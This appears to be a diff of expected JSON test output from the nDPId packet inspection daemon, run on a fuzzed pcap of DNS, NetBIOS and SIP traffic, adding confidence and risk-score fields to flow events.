+00687{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":395,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470304312,"flow_last_seen":1120470304312,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470398219,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"120.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":395,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1120469540839,"flow_last_seen":1120470352381,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":1992,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1120470398219,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":395,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470303331,"flow_last_seen":1120470307336,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470398219,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2770,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00423{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":397,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":92,"pkt_l4_len":0,"ts_msec":1120470399719,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOazwAJXMASxHAqAECwKgB\/wD+AIkAOltshS8BFAABAAAAAAAAIEVGRURFSkZQRUVFUEVOJXMASkVPQ0FDQUNBQ0FDQUJNAAAgAAE="}
 00199{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":397,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":58}
 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":398,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470402624,"flow_last_seen":1120470402624,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470402624,"l3_proto":"ip4","src_ip":"192.168.33.2","dst_ip":"192.168.1.1","src_port":2782,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":398,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":1,"flow_last_seen":1120470402624,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1120470402624,"pkt":"ADBUADRWAODtAW69CABFAABEaz0AAIARTBjAqCECwKgBAQreADUAMNT8T+QAAAABAAAAAAAAQTEBMAEwAzEyNwdpbi1hZGQgBGFycGEAAAwAAQ=="}
-00761{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":398,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470402624,"flow_last_seen":1120470402624,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470402624,"l3_proto":"ip4","src_ip":"192.168.33.2","dst_ip":"192.168.1.1","src_port":2782,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00868{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":398,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":144,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470402624,"flow_last_seen":1120470402624,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470402624,"l3_proto":"ip4","src_ip":"192.168.33.2","dst_ip":"192.168.1.1","src_port":2782,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":399,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470402625,"flow_last_seen":1120470402625,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470402625,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2782,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":399,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":1,"flow_last_seen":1120470402625,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1120470402625,"pkt":"AeDtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1Ct4AR7d4T+SAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"}
-00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":399,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470402625,"flow_last_seen":1120470402625,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470402625,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2782,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
+00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":399,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":145,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470402625,"flow_last_seen":1120470402625,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470402625,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2782,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":0,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":400,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470402627,"flow_last_seen":1120470402627,"flow_idle_time":180000,"flow_min_l4_payload_len":5,"flow_max_l4_payload_len":5,"flow_tot_l4_payload_len":5,"flow_avg_l4_payload_len":5,"midstream":0,"ts_msec":1120470402627,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":400,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":146,"flow_packet_id":1,"flow_last_seen":1120470402627,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":47,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":47,"pkt_l4_len":13,"ts_msec":1120470402627,"pkt":"ADBUADRWAODtAW69CABFAAAhaz4AAIARF87AqAEG1PIhIxPEE8QADcBLICAgICA="}
 00371{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":401,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":2566,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"ts_msec":1120470407625,"pkt":"AODtAW5nADBUADRWCgYAAQgABgQAAQAwVAA0VsCoAQEAAAAAAADAqAECiGQRAPY3AArAIQkOAAjPO\/nN"}
 00181{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":401,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":2566}
 00607{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":403,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470236795,"flow_last_seen":1120470236795,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470414647,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":403,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470236795,"flow_last_seen":1120470236795,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470414647,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":403,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470233792,"flow_last_seen":1120470233792,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470414647,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2763,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
-00708{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":403,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470315653,"flow_last_seen":1120470315653,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1120470414647,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22":"Unsafe Protocol"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
+00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":403,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470233792,"flow_last_seen":1120470233792,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470414647,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2763,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00815{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":403,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470315653,"flow_last_seen":1120470315653,"flow_idle_time":180000,"flow_min_l4_payload_len":201,"flow_max_l4_payload_len":201,"flow_tot_l4_payload_len":201,"flow_avg_l4_payload_len":201,"midstream":0,"ts_msec":1120470414647,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":138,"dst_port":138,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"NetBIOS.SMBv1","breed":"Dangerous","category":"System"}}
 00587{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":403,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470315338,"flow_last_seen":1120470315338,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470414647,"l3_proto":"ip4","src_ip":"192.168.1.57","dst_ip":"192.168.1.1","src_port":2771,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00656{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":403,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470315340,"flow_last_seen":1120470315340,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470414647,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2771,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00682{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":403,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470315340,"flow_last_seen":1120470315340,"flow_idle_time":180000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":63,"midstream":0,"ts_msec":1120470414647,"l3_proto":"ip4","src_ip":"192.168.1.1","dst_ip":"192.168.1.2","src_port":53,"dst_port":2771,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":403,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470414647,"flow_last_seen":1120470414647,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470414647,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":1,"flow_last_seen":1120470414647,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470414647,"pkt":"ADBUADRWAODtAW69CABFAABIa0oAAIARTAfAqAECwKgBAQrfADUANOABSeQBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAQhAAE="}
-00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":403,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470414647,"flow_last_seen":1120470414647,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470414647,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1057,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":403,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470414647,"flow_last_seen":1120470414647,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470414647,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1057,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":404,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":2,"flow_last_seen":1120470415643,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470415643,"pkt":"ADBUJXMAAODtAW69CABFAABIa0sAAIARTAbAqAECwKgBAQrfADUANOABSeQBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00766{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":404,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470414647,"flow_last_seen":1120470415643,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470415643,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00792{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":404,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470414647,"flow_last_seen":1120470415643,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470415643,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00407{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":405,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"ts_msec":1120470417645,"pkt":"ADBUADRWAOCqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
 00182{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":405,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":43690}
 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":406,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470419648,"flow_last_seen":1120470419648,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470419648,"l3_proto":"ip4","src_ip":"0.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":1,"flow_last_seen":1120470419648,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470419648,"pkt":"ADBUADRWAODtAW69CABFAABIa00AAIARJXMAqAECwKgBAQrfADUANOABSeQBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":406,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470419648,"flow_last_seen":1120470419648,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470419648,"l3_proto":"ip4","src_ip":"0.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00782{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":406,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470419648,"flow_last_seen":1120470419648,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470419648,"l3_proto":"ip4","src_ip":"0.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":407,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":3,"flow_last_seen":1120470423654,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470423654,"pkt":"ADBUADRWAODtAW69CABFAABIa04AAIARTAPAqAECwKgBAQrfADUANOABSeQBAAIBAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00806{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":407,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470414647,"flow_last_seen":1120470423654,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470423654,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17":"Malformed packet"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00913{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":407,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":147,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470414647,"flow_last_seen":1120470423654,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470423654,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2783,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":408,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470259918,"flow_last_seen":1120470259918,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470431656,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":14798,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
